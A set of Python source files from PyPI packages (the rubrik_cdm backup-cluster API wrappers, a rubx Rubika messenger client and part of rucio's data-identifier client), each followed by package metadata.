raise InvalidTypeException("The 'config' argument must be a dictionary.")
self.log("update_aws_native_account: Checking the Rubrik cluster for the AWS Native Account.")
account_id = self.object_id(aws_account_name, "aws_native", timeout=timeout)
self.log("update_aws_native_account: Updating the AWS Native Account.")
return self.patch("internal", "/aws/account/{}".format(account_id), config) | /rubrik_cdm-2.0.10.tar.gz/rubrik_cdm-2.0.10/rubrik_cdm/cloud.py | 0.645679 | 0.196171 | cloud.py | pypi |
from .api import Api
from .exceptions import InvalidParameterException, InvalidTypeException
import inspect
class Physical(Api):
"""This class contains methods related to the management of the Physical objects in the Rubrik cluster."""
def add_physical_host(self, hostname, timeout=60):
"""Add a physical host to the Rubrik cluster.
Arguments:
hostname {str} or [list] -- The hostname(s) or IP Address(es) of the physical host you want to add to the Rubrik cluster.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {60})
Returns:
str -- No change required. The host '`hostname`' is already connected to the Rubrik cluster.
dict -- The full API response for `POST /v1/host`.
"""
self.function_name = inspect.currentframe().f_code.co_name
if(len(hostname) == 0):
raise InvalidParameterException("The provided hostname list is empty.")
self.log('Searching the Rubrik cluster for the current hosts.')
current_hosts = self.get('v1', '/host', timeout=timeout)
if isinstance(hostname, list):
for host in current_hosts['data']:
for single_host in hostname:
if host['hostname'] == single_host:
hostname.remove(single_host)
self.log("The host '{}' is already connected to the Rubrik cluster. '{}' skipped.".format(
single_host, single_host))
config = []
self.log("Adding '{}' Physical Host(s)".format(len(hostname)))
if len(hostname) != 0:
for hosts in hostname:
config += [{
'hostname': hosts,
'hasAgent': True
}]
self.log("Adding the following physical host(s): '{}'".format(hostname))
return self.post('internal', '/host/bulk', config, timeout)
else:
return "No change required. All Hosts have already been added or supplied list was empty."
else:
for host in current_hosts['data']:
if host['hostname'] == hostname:
return "No change required. The host '{}' is already connected to the Rubrik cluster.".format(
hostname)
config = {}
config['hostname'] = hostname
config['hasAgent'] = True
self.log("Adding the host '{}' to the Rubrik cluster.".format(hostname))
return self.post('v1', '/host', config, timeout)
def delete_physical_host(self, hostname, timeout=120):
"""Delete a physical host from the Rubrik cluster.
Arguments:
hostname {str} -- The hostname or IP Address of the physical host you wish to remove from the Rubrik cluster.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {120})
Returns:
str -- No change required. The host '`hostname`' is not connected to the Rubrik cluster.
dict -- The full API response for `DELETE /v1'/host/{host_id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log('Searching the Rubrik cluster for the current hosts.')
current_hosts = self.get('v1', '/host', timeout=timeout)
host_present = False
for host in current_hosts['data']:
if host['hostname'] == hostname:
host_present = True
host_id = host['id']
break
if not host_present:
return "No change required. The host '{}' is not connected to the Rubrik cluster.".format(
hostname)
self.log("Deleting the host '{}' from the Rubrik cluster.".format(hostname))
return self.delete('v1', '/host/{}'.format(host_id), timeout=timeout)
def create_physical_fileset(self, name, operating_system, include, exclude, exclude_exception, follow_network_shares=False, backup_hidden_folders=False, timeout=15): # pylint: ignore
"""Create a Fileset for a Linux or Windows machine.
Arguments:
name {str} -- The name of the Fileset you wish to create.
operating_system {str} -- The operating system type of the Fileset you are creating. (choices: {Linux, Windows.})
include {list} -- The full paths or wildcards that define the objects to include in the Fileset backup (ex: ['/usr/local', '*.pdf']).
exclude {list} -- The full paths or wildcards that define the objects to exclude from the Fileset backup (ex: ['/user/local/temp', '*.mov', '*.mp3']).
exclude_exception {list} -- The full paths or wildcards that define the objects that are exempt from the `excludes` variables. (ex. ['/company/*.mp4').
Keyword Arguments:
follow_network_shares {bool} -- Include or exclude locally-mounted remote file systems from backups. (default: {False})
backup_hidden_folders {bool} -- Include or exclude hidden folders inside locally-mounted remote file systems from backups. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The Rubrik cluster already has a `operating_system` Fileset named '`name`' configured with the provided variables.
dict -- The full response for the `POST /internal/fileset_template/bulk` API endpoint.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_operating_system = ['Linux', 'Windows']
if operating_system not in valid_operating_system:
raise InvalidParameterException("The create_physical_fileset() operating_system argument must be one of the following: {}.".format(
valid_operating_system))
if isinstance(follow_network_shares, bool) is False:
raise InvalidTypeException("The 'follow_network_shares' argument must be True or False.")
elif isinstance(backup_hidden_folders, bool) is False:
raise InvalidTypeException("The 'backup_hidden_folders' argument must be True or False.")
elif isinstance(include, list) is False:
raise InvalidTypeException("The 'include' argument must be a list object.")
elif isinstance(exclude, list) is False:
raise InvalidTypeException("The 'exclude' argument must be a list object.")
elif isinstance(exclude_exception, list) is False:
raise InvalidTypeException("The 'exclude_exception' argument must be a list object.")
config = {}
config['name'] = name
config['includes'] = sorted(include)
config['excludes'] = sorted(exclude)
config['exceptions'] = sorted(exclude_exception)
config['allowBackupHiddenFoldersInNetworkMounts'] = backup_hidden_folders
config['allowBackupNetworkMounts'] = follow_network_shares
config['operatingSystemType'] = operating_system
self.log("create_fileset: Searching the Rubrik cluster for all current {} Filesets.".format(operating_system))
current_filesets = self.get(
'v1', '/fileset_template?primary_cluster_id=local&operating_system_type={}&name={}'.format(
operating_system, name), timeout=timeout)
current_config = {}
if current_filesets['data']:
current_config['name'] = current_filesets['data'][0]['name']
current_config['includes'] = sorted(current_filesets['data'][0]['includes'])
current_config['excludes'] = sorted(current_filesets['data'][0]['excludes'])
current_config['exceptions'] = sorted(current_filesets['data'][0]['exceptions'])
current_config['allowBackupHiddenFoldersInNetworkMounts'] = current_filesets['data'][0]['allowBackupHiddenFoldersInNetworkMounts']
current_config['operatingSystemType'] = current_filesets['data'][0]['operatingSystemType']
current_config['allowBackupNetworkMounts'] = current_filesets['data'][0]['allowBackupNetworkMounts']
if current_config == config:
return "No change required. The Rubrik cluster already has a {} Fileset named '{}' configured with the provided variables.".format(
operating_system, name)
# Add the config dict to a list
model = []
model.append(config)
self.log("create_fileset: Creating the '{}' Fileset.".format(name))
return self.post('internal', '/fileset_template/bulk', model, timeout=timeout)
def create_nas_fileset(self, name, share_type, include, exclude, exclude_exception, follow_network_shares=False, timeout=15): # pylint: ignore
"""Create a NAS Fileset.
Arguments:
name {str} -- The name of the Fileset you wish to create.
share_type {str} -- The type of NAS Share you wish to backup. (choices: {NFS, SMB})
include {list} -- The full paths or wildcards that define the objects to include in the Fileset backup.
exclude {list} -- The full paths or wildcards that define the objects to exclude from the Fileset backup.
exclude_exception {list} -- The full paths or wildcards that define the objects that are exempt from the `excludes` variables.
Keyword Arguments:
follow_network_shares {bool} -- Include or exclude locally-mounted remote file systems from backups. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The Rubrik cluster already has a NAS Fileset named '`name`' configured with the provided variables.
dict -- The full response for the `POST /internal/fileset_template/bulk` API endpoint.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_share_type = ['NFS', 'SMB']
if share_type not in valid_share_type:
raise InvalidParameterException(
"The create_fileset() share_type argument must be one of the following: {}.".format(valid_share_type))
if isinstance(follow_network_shares, bool) is False:
raise InvalidTypeException("The 'follow_network_shares' argument must be True or False.")
elif isinstance(include, list) is False:
raise InvalidTypeException("The 'include' argument must be a list object.")
elif isinstance(exclude, list) is False:
raise InvalidTypeException("The 'exclude' argument must be a list object.")
elif isinstance(exclude_exception, list) is False:
raise InvalidTypeException("The 'exclude_exception' argument must be a list object.")
config = {}
config['name'] = name
config['includes'] = sorted(include)
config['excludes'] = sorted(exclude)
config['exceptions'] = sorted(exclude_exception)
config['allowBackupHiddenFoldersInNetworkMounts'] = follow_network_shares
config['shareType'] = share_type
self.log("create_fileset: Searching the Rubrik cluster for all current NAS Filesets.")
current_filesets = self.get(
'v1', '/fileset_template?primary_cluster_id=local&operating_system_type=NONE&name={}'.format(name), timeout=timeout)
current_config = {}
if current_filesets['data']:
current_config['name'] = current_filesets['data'][0]['name']
current_config['includes'] = sorted(current_filesets['data'][0]['includes'])
current_config['excludes'] = sorted(current_filesets['data'][0]['excludes'])
current_config['exceptions'] = sorted(current_filesets['data'][0]['exceptions'])
current_config['allowBackupHiddenFoldersInNetworkMounts'] = current_filesets['data'][0]['allowBackupHiddenFoldersInNetworkMounts']
current_config['shareType'] = current_filesets['data'][0]['shareType']
if current_config == config:
return "No change required. The Rubrik cluster already has a NAS Fileset named '{}' configured with the provided variables.".format(
name)
# Add the config dict to a list
model = []
model.append(config)
self.log("create_fileset: Creating the '{}' Fileset.".format(name))
return self.post('internal', '/fileset_template/bulk', model, timeout=timeout)
def add_nas_share_to_host(self, hostname, share_type, export_point, username=None, password=None, domain=None, timeout=60): # pylint: ignore
"""Add a network share to a host.
Arguments:
hostname {str} -- The hostname or IP Address of the host serving the NAS share.
share_type {str} -- The type of NAS Share you wish to backup. (choices: {NFS, SMB})
export_point {str} -- Name of the share exported by the NAS host.
Keyword Arguments:
username {str} -- Username if the network share requires authentication.
password {str} -- Password if the network share requires authentication.
domain {str} -- Domain name of account credentials used for authentication.
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default {60})
Returns:
str -- No change required. The share with the given hostname and export point has already been added.
dict -- The full API response for `POST /internal/host/share` with the given share arguments.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_share_type = ['NFS', 'SMB']
share_address = "{}:{}".format(hostname, export_point)
if share_type not in valid_share_type:
raise InvalidParameterException(
"The add_nas_share_to_host() share_type argument must be one of the following: {}.".format(valid_share_type))
host_id = self.object_id(hostname, 'physical_host')
self.log("add_nas_share_to_host: Getting the properties of the {} share {}.".format(share_type, share_address))
current_host_shares = self.get(
'internal', '/host/share?share_type={}&hostid={}'.format(share_type, host_id),
timeout=timeout)
matching_current_host_share = [share_properties for share_properties in current_host_shares['data']
if share_properties['exportPoint'] == export_point]
if len(matching_current_host_share) >= 1:
return "No change required. The {} share {} is already in Rubrik.".format(share_type, share_address)
else:
config = {}
config['hostId'] = host_id
config['shareType'] = share_type
config['exportPoint'] = export_point
if username:
config['username'] = username
if password:
config['password'] = password
if domain:
config['domain'] = domain
self.log("Adding the {} share {} to Rubrik.".format(share_type, share_address))
return self.post('internal', '/host/share', config, timeout)
def assign_physical_host_fileset(self, hostname, fileset_name, operating_system, sla_name, include=None, exclude=None, exclude_exception=None, follow_network_shares=False, backup_hidden_folders=False, timeout=30): # pylint: ignore
"""Assign a Fileset to a Linux, Unix or Windows machine. If you have multiple Filesets with identical names, you will need to populate the Filesets properties (i.e this functions keyword arguments)
to find a specific match. Filesets with identical names and properties are not supported.
Arguments:
hostname {str} -- The hostname or IP Address of the physical host you wish to associate to the Fileset.
fileset_name {str} -- The name of the Fileset you wish to assign to the Linux, Unix or Windows host.
operating_system {str} -- The operating system of the physical host you are assigning a Fileset to. (choices: {Linux, Windows, UnixLike})
sla_name {str} -- The name of the SLA Domain to associate with the Fileset.
Keyword Arguments:
include {list} -- The full paths or wildcards that define the objects to include in the Fileset backup (ex: ['/usr/local', '*.pdf']). (default: {None})
exclude {list} -- The full paths or wildcards that define the objects to exclude from the Fileset backup (ex: ['/user/local/temp', '*.mov', '*.mp3']). (default: {None})
exclude_exception {list} -- The full paths or wildcards that define the objects that are exempt from the `excludes` variables. (ex: ['/company/*.mp4']). (default: {None})
follow_network_shares {bool} -- Include or exclude locally-mounted remote file systems from backups. (default: {False})
backup_hidden_folders {bool} -- Include or exclude hidden folders inside locally-mounted remote file systems from backups. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. The `operating_system` Fileset '`fileset_name`' is already assigned to the SLA Domain '`sla_name`' on the physical host '`hostname`'.
tuple -- When a new Fileset is created the following tuple will be returned: (Full API response from `POST /v1/fileset`, Full API response from `POST /v1/fileset/{id}`)
dict -- When the Fileset already exsits but is assigned to the wrong the SLA the Full API response from `POST `v1/fileset/{id}` is returned.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_operating_system = ['Linux', 'Windows', 'UnixLike']
if operating_system not in valid_operating_system:
raise InvalidParameterException("The assign_physical_host_fileset() operating_system argument must be one of the following: {}.".format(
valid_operating_system))
if include is None:
include = []
if exclude is None:
exclude = []
if exclude_exception is None:
exclude_exception = []
if isinstance(follow_network_shares, bool) is False:
raise InvalidTypeException("The 'follow_network_shares' argument must be True or False.")
elif isinstance(backup_hidden_folders, bool) is False:
raise InvalidTypeException("The 'backup_hidden_folders' argument must be True or False.")
elif isinstance(include, list) is False:
raise InvalidTypeException("The 'include' argument must be a list object.")
elif isinstance(exclude, list) is False:
raise InvalidTypeException("The 'exclude' argument must be a list object.")
elif isinstance(exclude_exception, list) is False:
raise InvalidTypeException("The 'exclude_exception' argument must be a list object.")
self.log(
"assign_physical_host_fileset: Searching the Rubrik cluster for the {} physical host {}.".format(
operating_system,
hostname))
current_hosts = self.get('v1',
'/host?operating_system_type={}&primary_cluster_id=local&hostname={}'.format(operating_system,
hostname),
timeout=timeout)
if current_hosts['total'] >= 1:
for host in current_hosts['data']:
if host['hostname'] == hostname:
host_id = host['id']
break
try:
host_id
except NameError:
raise InvalidParameterException(
"The Rubrik cluster is not connected to a {} physical host named '{}'.".format(operating_system, hostname))
self.log("assign_physical_host_fileset: Searching the Rubrik cluster for all current {} Filesets.".format(operating_system))
current_filesets_templates = self.get(
'v1', '/fileset_template?primary_cluster_id=local&operating_system_type={}&name={}'.format(
operating_system, fileset_name), timeout=timeout)
number_of_matches = 0
if current_filesets_templates['total'] == 0:
raise InvalidParameterException(
"The Rubrik cluster does not have a {} Fileset named '{}'.".format(
operating_system, fileset_name))
elif current_filesets_templates['total'] > 1:
for fileset_template in current_filesets_templates['data']:
if fileset_template['name'] == fileset_name:
number_of_matches += 1
if number_of_matches > 1:
# If there are multiple Filesets with the same name us all of
# the possible config values to try and find the correct
# Fileset
for fileset_template in current_filesets_templates['data']:
if fileset_template['name'] == fileset_name \
and fileset_template['includes'] == include \
and fileset_template['excludes'] == exclude \
and fileset_template['exceptions'] == exclude_exception \
and fileset_template['allowBackupHiddenFoldersInNetworkMounts'] == follow_network_shares \
and fileset_template['allowBackupNetworkMounts'] == backup_hidden_folders:
fileset_template_id = fileset_template['id']
number_of_matches = 1
try:
fileset_template_id
except NameError:
if number_of_matches > 0:
# If no unique matches are found provide an error
# message
if include != [] \
or exclude != [] \
or exclude_exception != [] \
or follow_network_shares\
or backup_hidden_folders:
# Error message that first checks to see if any of
# the extra variables are populated with anything
# besides the default (aka the user tried to be as
# unique as possible)
raise InvalidParameterException(
"The Rubrik cluster contains multiple {} Filesets named '{}' that match all of the populate function arguments. Please use a unique Fileset.".format(
operating_system, fileset_name))
else:
raise InvalidParameterException(
"The Rubrik cluster contains multiple {} Filesets named '{}'. Please populate all function arguments to find a more specific match.".format(
operating_system, fileset_name))
if current_filesets_templates['total'] == 1 or number_of_matches == 1:
for fileset_temmplate in current_filesets_templates['data']:
if fileset_temmplate['name'] == fileset_name:
fileset_template_id = fileset_temmplate['id']
self.log("assign_physical_host_fileset: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
self.log("assign_physical_host_fileset: Getting the properties of the {} Fileset.".format(fileset_name))
current_fileset = self.get(
'v1', '/fileset?primary_cluster_id=local&host_id={}&is_relic=false&template_id={}'.format(host_id, fileset_template_id), timeout=timeout)
if current_fileset['total'] == 0:
self.log(
"assign_physical_host_fileset: Assigning the '{}' Fileset to the {} physical host '{}'.".format(
fileset_name,
operating_system,
hostname))
config = {}
config['hostId'] = host_id
config['templateId'] = fileset_template_id
create_fileset = self.post('v1', '/fileset', config, timeout)
fileset_id = create_fileset['id']
config = {}
config['configuredSlaDomainId'] = sla_id
assign_sla = self.patch('v1', '/fileset/{}'.format(fileset_id), config, timeout)
return (create_fileset, assign_sla)
elif current_fileset['total'] == 1 and current_fileset['data'][0]['configuredSlaDomainId'] != sla_id:
self.log(
"assign_physical_host_fileset: Assigning the '{}' SLA Domain to the '{}' Fileset attached to the {} physical host '{}'.".format(
sla_name,
fileset_name,
operating_system,
hostname))
fileset_id = current_fileset['data'][0]['id']
config = {}
config['configuredSlaDomainId'] = sla_id
return self.patch('v1', '/fileset/{}'.format(fileset_id), config, timeout)
elif current_fileset['total'] == 1 and current_fileset['data'][0]['configuredSlaDomainId'] == sla_id:
return "No change required. The {} Fileset '{}' is already assigned to the SLA Domain '{}' on the physical host '{}'.".format(
operating_system, fileset_name, sla_name, hostname)
def add_host_share(self, hostname, share_type, export_point, username=None, password=None, domain=None, timeout=60):
"""Add a network share object to a host.
Arguments:
hostname {str} -- The hostname or IP Address of the physical host you want to add to the Rubrik cluster.
share_type {str} -- The share object type to be added to the host. (choices: {NFS, SMB})
export_point {str} -- The NFS export path of the share.
Keyword Arguments:
username {str} -- The username for the host. (default: {None})
password {str} -- The password for the host. (default: {None})
domain {str} -- The domain for the host (default: {None})
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {60})
Returns:
dict -- The full API response for `POST /internal/host/share`.
"""
self.function_name = inspect.currentframe().f_code.co_name
if(len(hostname) == 0 or len(share_type) == 0 or len(export_point) == 0):
raise InvalidParameterException("The provided hostname list, share_type, export_point is empty.")
self.log('Searching the Rubrik cluster for the host ID.')
host_id = self.object_id(hostname, 'physical_host', timeout=timeout)
config = {}
config['hostname'] = hostname
config['hostId'] = host_id
config['shareType'] = share_type
config['exportPoint'] = export_point
config['username'] = username
config['password'] = password
config['domain'] = domain
self.log("add_host_share: Adding share object '{}' to Physical Host ID {}".format(export_point, host_id))
return self.post('internal', '/host/share', config, timeout) | /rubrik_cdm-2.0.10.tar.gz/rubrik_cdm-2.0.10/rubrik_cdm/physical.py | 0.832271 | 0.22439 | physical.py | pypi |
from .api import Api
import inspect
class Organization(Api):
"""This class contains methods related to backup and restore operations for the various objects managed by the Rubrik cluster."""
def add_organization_protectable_object_mssql_server_host(self, organization_name, mssql_host, timeout=15):
"""Add a MSSQL Server Host to an organization as a protectable object.
Arguments:
organization_name {str} -- The name of the organization you wish to add the protectable object to.
mssql_host {str} -- The name of the MSSQL Host to add to the organization as a protectable object.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The MSSQL host {mssql_host} is already assigned to the {organization_name} organization.
dict -- The full API response for `POST /internal/role/{id}/authorization`
"""
self.function_name = inspect.currentframe().f_code.co_name
organization_id = self.object_id(
organization_name, "organization", timeout=timeout)
org_admin_id = self.object_id(
organization_name, "organization_admin_role", timeout=timeout)
self.log("add_organization_protectable_object_sql_server: Gathering the current MSSQL objects protected by the {} organization.".format(
organization_name))
current_mssql_protected_objects = self.get(
"internal", "/organization/{}/mssql".format(organization_id), timeout=timeout)
objects_to_protect = []
sql_host_id = self.object_id(
mssql_host, "physical_host", timeout=timeout)
for protected_object in current_mssql_protected_objects["data"]:
if protected_object["managedId"] == sql_host_id:
return "No change required. The MSSQL host {} is already assigned to the {} organization.".format(mssql_host, organization_name)
objects_to_protect.append(sql_host_id)
config = {
"authorizationSpecifications": [
{
"privilege": "ManageRestoreSource",
"resources": objects_to_protect
}
],
"roleTemplate": "Organization"
}
return self.post("internal", "/role/{}/authorization".format(org_admin_id), config, timeout=timeout)
def add_organization_protectable_object_sql_server_db(self, organization_name, mssql_db, mssql_host, mssql_instance, timeout=15):
"""Add a MSSQL Database to an organization as a protectable object.
Arguments:
organization_name {str} -- The name of the organization you wish to add the protectable object to.
mssql_db {str} -- The name of the MSSQL DB to add to the organization as a protectable object.
mssql_instance {str} -- The name of the MSSQL instance where the MSSQL DB lives.
mssql_host {str} -- The name of the MSSQL host where the MSSQL DB lives.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The MSSQL DB {mssql_db} is already assigned to the {organization_name} organization.
dict -- The full API response for `POST /internal/role/{id}/authorization`
"""
self.function_name = inspect.currentframe().f_code.co_name
organization_id = self.object_id(
organization_name, "organization", timeout=timeout)
org_admin_id = self.object_id(
organization_name, "organization_admin_role", timeout=timeout)
self.log("add_organization_protectable_object_sql_server: Gathering the current MSSQL objects protected by the {} organization.".format(
organization_name))
current_mssql_protected_objects = self.get(
"internal", "/organization/{}/mssql".format(organization_id), timeout=timeout)
objects_to_protect = []
db_id = self.object_id(
mssql_db, "mssql_db", mssql_instance=mssql_instance, mssql_host=mssql_host, timeout=timeout)
for protected_object in current_mssql_protected_objects["data"]:
if protected_object["managedId"] == db_id:
return "No change required. The MSSQL DB {} is already assigned to the {} organization.".format(mssql_db, organization_name)
objects_to_protect.append(db_id)
config = {
"authorizationSpecifications": [
{
"privilege": "ManageRestoreSource",
"resources": objects_to_protect
}
],
"roleTemplate": "Organization"
}
return self.post("internal", "/role/{}/authorization".format(org_admin_id), config, timeout=timeout)
def add_organization_protectable_object_sql_server_availability_group(self, organization_name, mssql_availability_group, timeout=15):
"""Add a MSSQL Availability Group to an organization as a protectable object.
Arguments:
organization_name {str} -- The name of the organization you wish to add the protectable object to.
mssql_availability_group {str} -- The name of the MSSQL Availability Group to add to the organization as a protectable object.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- No change required. The MSSQL Availability Group {mssql_availability_group} is already assigned to the {organization_name} organization.
dict -- The full API response for `POST /internal/role/{id}/authorization`
"""
self.function_name = inspect.currentframe().f_code.co_name
organization_id = self.object_id(
organization_name, "organization", timeout=timeout)
org_admin_id = self.object_id(
organization_name, "organization_admin_role", timeout=timeout)
self.log("add_organization_protectable_object_sql_server: Gathering the current MSSQL objects protected by the {} organization.".format(
organization_name))
current_mssql_protected_objects = self.get(
"internal", "/organization/{}/mssql".format(organization_id), timeout=timeout)
objects_to_protect = []
ag_id = self.object_id(
mssql_availability_group, "mssql_availability_group", timeout=timeout)
for protected_object in current_mssql_protected_objects["data"]:
if protected_object["managedId"] == ag_id:
return "No change required. The MSSQL Availability Group {} is already assigned to the {} organization.".format(mssql_availability_group, organization_name)
objects_to_protect.append(ag_id)
config = {
"authorizationSpecifications": [
{
"privilege": "ManageRestoreSource",
"resources": objects_to_protect
}
],
"roleTemplate": "Organization"
}
return self.post("internal", "/role/{}/authorization".format(org_admin_id), config, timeout=timeout) | /rubrik_cdm-2.0.10.tar.gz/rubrik_cdm-2.0.10/rubrik_cdm/organization.py | 0.855776 | 0.284424 | organization.py | pypi |
from .connection import GetData
from .sessions import RubikaClient as Client
class Method(object):
@classmethod
def from_json(cls, session: str, method_name: str,
*args, **kwargs) -> (dict):
'''
# this is a method to use custom method on rubika client
Method('session', 'SendMessage', chat_id='u0...', text='Hey!')
'''
# use as personalization and customization
'''
kwargs methods:
data: dict = {}
assert list(map(lambda key: data.update({key: kwargs.get(key)}, list(kwargs.keys()))))
'''
return (
GetData.api(
version = '5',
method = method_name[0].lower() + method_name[1:],
auth = session,
data = kwargs,
proxy = {'http': 'http://127.0.0.1:9050'},
platform = 'rubx',
mode = 'mashhad'
)
)
class Messenger(Method):
def __init__(self, session: str = None, *args, **kwargs) -> None:
'''
with Messenger() as client:
client.session = 'key'
result = client.method('getMessagesUpdates', object_guid=..., state=...)
print(result)
'''
self.session = session
def __enter__(self, *args, **kwargs):
return self
def __exit__(self):
pass
def method(self, method_name: str, proxy: dict = {'http': 'http://127.0.0.1:9050'},
platform: str='rubx', city: str='mashhad',
api_version: int = 5, *args, **data) -> GetData:
'''
self.method(method_name='example', ...)
'''
return (
GetData.api(
version = api_version,
method = method_name[0].lower() + method_name[1:],
auth = self.session,
data = kwargs or {},
proxy = proxy,
platform = platform,
mode = city
)
) | /rubx-10.6.9-py3-none-any.whl/rb/methods.py | 0.644673 | 0.174516 | methods.py | pypi |
from datetime import datetime
from json import dumps
from urllib.parse import quote_plus
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.exception import DeprecationError
from rucio.common.utils import build_url, render_json, render_json_list, date_to_str
class DIDClient(BaseClient):
"""DataIdentifier client class for working with data identifiers"""
DIDS_BASEURL = 'dids'
ARCHIVES_BASEURL = 'archives'
def list_dids(self, scope, filters, did_type='collection', long=False, recursive=False):
"""
List all data identifiers in a scope which match a given pattern.
:param scope: The scope name.
:param filters: A nested dictionary of key/value pairs like [{'key1': 'value1', 'key2.lte': 'value2'}, {'key3.gte, 'value3'}].
Keypairs in the same dictionary are AND'ed together, dictionaries are OR'ed together. Keys should be suffixed
like <key>.<operation>, e.g. key1 >= value1 is equivalent to {'key1.gte': value}, where <operation> belongs to one
of the set {'lte', 'gte', 'gt', 'lt', 'ne' or ''}. Equivalence doesn't require an operator.
:param did_type: The type of the did: 'all'(container, dataset or file)|'collection'(dataset or container)|'dataset'|'container'|'file'
:param long: Long format option to display more information for each DID.
:param recursive: Recursively list DIDs content.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), 'dids', 'search'])
# stringify dates.
if isinstance(filters, dict): # backwards compatability for filters as single {}
filters = [filters]
for or_group in filters:
for key, value in or_group.items():
if isinstance(value, datetime):
or_group[key] = date_to_str(value)
payload = {
'type': did_type,
'filters': filters,
'long': long,
'recursive': recursive
}
url = build_url(choice(self.list_hosts), path=path, params=payload)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
dids = self._load_json_data(r)
return dids
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_dids_extended(self, scope, filters, did_type='collection', long=False, recursive=False):
"""
List all data identifiers in a scope which match a given pattern (DEPRECATED)
"""
raise DeprecationError("Command or function has been deprecated. Please use list_dids instead.")
def add_did(self, scope, name, did_type, statuses=None, meta=None, rules=None, lifetime=None, dids=None, rse=None):
"""
Add data identifier for a dataset or container.
:param scope: The scope name.
:param name: The data identifier name.
:param did_type: The data identifier type (file|dataset|container).
:param statuses: Dictionary with statuses, e.g.g {'monotonic':True}.
:param meta: Meta-data associated with the data identifier is represented using key/value pairs in a dictionary.
:param rules: Replication rules associated with the data identifier. A list of dictionaries, e.g., [{'copies': 2, 'rse_expression': 'TIERS1'}, ].
:param lifetime: DID's lifetime (in seconds).
:param dids: The content.
:param rse: The RSE name when registering replicas.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name)])
url = build_url(choice(self.list_hosts), path=path)
# Build json
data = {'type': did_type}
if statuses:
data['statuses'] = statuses
if meta:
data['meta'] = meta
if rules:
data['rules'] = rules
if lifetime:
data['lifetime'] = lifetime
if dids:
data['dids'] = dids
if rse:
data['rse'] = rse
r = self._send_request(url, type_='POST', data=render_json(**data))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_dids(self, dids):
"""
Bulk add datasets/containers.
"""
path = '/'.join([self.DIDS_BASEURL])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=render_json_list(dids))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_dataset(self, scope, name, statuses=None, meta=None, rules=None, lifetime=None, files=None, rse=None):
"""
Add data identifier for a dataset.
:param scope: The scope name.
:param name: The data identifier name.
:param statuses: Dictionary with statuses, e.g.g {'monotonic':True}.
:param meta: Meta-data associated with the data identifier is represented using key/value pairs in a dictionary.
:param rules: Replication rules associated with the data identifier. A list of dictionaries, e.g., [{'copies': 2, 'rse_expression': 'TIERS1'}, ].
:param lifetime: DID's lifetime (in seconds).
:param files: The content.
:param rse: The RSE name when registering replicas.
"""
return self.add_did(scope=scope, name=name, did_type='DATASET',
statuses=statuses, meta=meta, rules=rules,
lifetime=lifetime, dids=files, rse=rse)
def add_datasets(self, dsns):
"""
Bulk add datasets.
:param dsns: A list of datasets.
"""
return self.add_dids(dids=[dict(list(dsn.items()) + [('type', 'DATASET')]) for dsn in dsns])
def add_container(self, scope, name, statuses=None, meta=None, rules=None, lifetime=None):
"""
Add data identifier for a container.
:param scope: The scope name.
:param name: The data identifier name.
:param statuses: Dictionary with statuses, e.g.g {'monotonic':True}.
:param meta: Meta-data associated with the data identifier is represented using key/value pairs in a dictionary.
:param rules: Replication rules associated with the data identifier. A list of dictionaries, e.g., [{'copies': 2, 'rse_expression': 'TIERS1'}, ].
:param lifetime: DID's lifetime (in seconds).
"""
return self.add_did(scope=scope, name=name, did_type='CONTAINER', statuses=statuses, meta=meta, rules=rules, lifetime=lifetime)
def add_containers(self, cnts):
"""
Bulk add containers.
:param cnts: A list of containers.
"""
return self.add_dids(dids=[dict(list(cnts.items()) + [('type', 'CONTAINER')]) for cnt in cnts])
def attach_dids(self, scope, name, dids, rse=None):
"""
Attach data identifier.
:param scope: The scope name.
:param name: The data identifier name.
:param dids: The content.
:param rse: The RSE name when registering replicas.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids'])
url = build_url(choice(self.list_hosts), path=path)
data = {'dids': dids}
if rse:
data['rse'] = rse
r = self._send_request(url, type_='POST', data=render_json(**data))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def detach_dids(self, scope, name, dids):
"""
Detach data identifier
:param scope: The scope name.
:param name: The data identifier name.
:param dids: The content.
"""
